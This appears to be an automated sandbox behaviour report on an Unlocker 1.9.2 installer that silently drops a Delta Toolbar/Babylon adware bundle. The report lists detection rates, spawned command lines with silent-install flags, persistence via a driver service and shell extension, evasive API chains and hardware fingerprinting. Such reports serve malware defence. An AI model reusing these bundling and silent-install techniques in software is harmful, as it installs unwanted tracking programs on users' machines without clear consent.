Source: Unlocker1.9.2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004046CA0_2_004046CA
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405FA80_2_00405FA8
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A31F31_2_009A31F3
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004500152_2_00450015
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0045832D2_2_0045832D
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004524B02_2_004524B0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004997402_2_00499740
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: String function: 004CC5C0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeSection loaded: reslib.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerDriver5.sys
Source: sqlite3.dll.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: sqlite3.dll.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DeltaTB.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9996548694779116
Source: Unlocker1.9.2.exeReversingLabs: Detection: 55%
Source: Unlocker1.9.2.exeVirustotal: Detection: 43%
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile read: C:\Users\user\Desktop\Unlocker1.9.2.exe
Source: Unlocker1.9.2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\Unlocker1.9.2.exe C:\Users\user\Desktop\Unlocker1.9.2.exe
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Users\user\AppData\Local\Temp\DeltaTB.exe "C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeProcess created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache trkInfo|http://babylon.com
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Unlocker\UnlockerCOM.dll"
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: README.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\README.TXT
Source: Start Unlocker.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\Unlocker.exe
Source: Website.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\Unlocker.url
Source: Uninstall.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\uninst.exe
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5445.tmp
Source: Unlocker.exe.0.drBinary string: %s\Unlocker-Log.txt\Device\LanmanRedirector%S%S\LanmanRedirector\%S\??\LanmanRedirector%c:\\.\%c:"0:\%s\\\\?\%s\Unlocker.cfgIsWow64Processopenhttp://unlocker.emptyloop.com/GET /unlocker/version.txt HTTP/1.0
Source: UnlockerDriver5.sys.0.drBinary string: C2C\DosDevices\UnlockerDriver5\Device\UnlockerDriver5
Source: classification engineClassification label: mal48.spyw.evad.winEXE@15/56@3/2
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHAutoComplete,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceExA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041CD
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, Setup.exe, 00000002.00000003.352019348.000000000089E000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);name='%q'
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');sqlite_sequence
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;U
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049D9C0 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_0049D9C0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A1B44 LoadResource,SizeofResource,LockResource,1_2_009A1B44
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile written: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\Delta.ini
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: OK
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Next >
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: I Agree
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Next >
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Next >
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Install
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v2.46 Nullsoft Install System v2.46License AgreementPlease review the license terms before installing Unlocker 1.9.2.Press Page Down to see the rest of the agreement.A. Unlocker End User License AgreementB. Delta Toolbar End User License AgreementA. Unlocker End User License AgreementThis software is provided "as is" without any guarantee made as to its suitability or fitness for any particular use. It may contain bugs so use of this tool is at your own risk. We take no responsibility for any damage that may unintentionally be caused through its use.You may not distribute Unlocker in any form without express written permission of Cedrick Collomb (ccollomb@emptyloop.com)B. Delta Toolbar End User License AgreementYou have the option of installing the Delta Toolbar. By Installing the Delta Toolbar you agree to Delta End-User Licence Agreement and Delta Privacy Statement. You can easily remove this application at any time.o Delta End-User Licence Agreement: http://info.delta-search.com/uninstall/eula.htmlo Delta Privacy Statement http://info.delta-search.com/uninstall/privacy.htmlIf you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Unlocker 1.9.2.
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UnlockerJump to behavior
Source: Unlocker1.9.2.exeStatic file information: File size 1078591 > 1048576
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\Unlocker.exeJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerInject32.exeJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerCOM.dllJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\Unlocker.urlJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\uninst.exeJump to behavior
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdb source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: Binary string: C:\projects\meitar-branch\SP_Meitar\Release_Win32\ReportUrlDll.pdb source: setup.exe, 00000006.00000000.352332785.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe, 00000006.00000002.353687641.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe.2.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdbp source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdbN source: Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\BExternal.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.351621352.000000000089D000.00000004.00000020.00020000.00000000.sdmp, BExternal.dll.1.dr, BExternal.dll.2.dr
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdbp;V source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdb source: DeltaTB.exe, 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, DeltaTB.exe, 00000001.00000000.339008902.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdbH source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004568A5 push ecx; ret 2_2_004568B8
Source: BExternal.dll.1.drStatic PE information: section name: .SHARDAT
Source: sqlite3.dll.1.drStatic PE information: section name: .stab
Source: sqlite3.dll.1.drStatic PE information: section name: .stabstr
Source: sqlite3.dll.2.drStatic PE information: section name: .stab
Source: sqlite3.dll.2.drStatic PE information: section name: .stabstr
Source: BExternal.dll.2.drStatic PE information: section name: .SHARDAT
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerCOM.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\sqlite3.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\uninst.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\DeltaTB.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\IEHelper.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\IEHelper.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerInject32.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\Unlocker.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\sqlite3.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\LangDLL.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\README.TXTJump to behavior

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWindow found: window name: ProgmanJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\UnlockerShellExtension NULLJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\README.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Start Unlocker.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Website.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UnlockerDriver5Jump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049D9C0 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_0049D9C0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-32026
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-32039
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\uninst.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\UnlockerInject32.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\Unlocker.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: _memset,GetVolumeInformationW,_memset,GetAdaptersInfo,_memset,StringFromGUID2,2_2_004F4BC0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A121F _wcscpy,_wcscpy,_wcscat,FindFirstFileW,1_2_009A121F
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049F0E0 FindFirstFileW,FindClose,2_2_0049F0E0
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAPI call chain: ExitProcess graph end nodegraph_0-3146
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
Source: rundll32.exe, 00000003.00000002.347884515.0000000003428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
